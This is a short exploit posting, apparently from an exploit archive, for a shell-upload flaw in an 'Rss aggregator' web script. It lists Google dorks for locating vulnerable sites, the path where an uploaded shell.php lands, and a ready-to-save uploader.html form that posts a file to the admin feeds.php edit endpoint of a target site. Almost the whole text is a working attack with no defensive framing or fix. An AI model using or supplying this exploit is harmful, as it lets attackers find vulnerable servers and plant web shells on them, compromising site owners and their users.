Rss aggregator Upload Shell Vulnerability

Rss aggregator Upload Shell

# Google Dork : inurl:"/feed-sources"
# Google Dork : inurl:"/top-hits-items"
# Exploit : /upload/feeds_logos/
# Shell : http://www.target.com/upload/feeds_logos/shell.php

Save as: uploader.html

<html>
<title>RSS script Shell Upload Exploit</title>
<center>
# dork : inurl:"/feed-sources" inurl:"/top-hits-items"<br>
# exploit :Test exploit --> /upload/feeds_logos/<br><br>
<form action="http://www.target.com/admin/feeds.php?do=edit&id=1" method="post" enctype="multipart/form-data">
<label for="file">File :</label>
<input type="file" name="file" id="file"><br>
<input type="submit" name="submit" value="Submit">
</form>

Tweet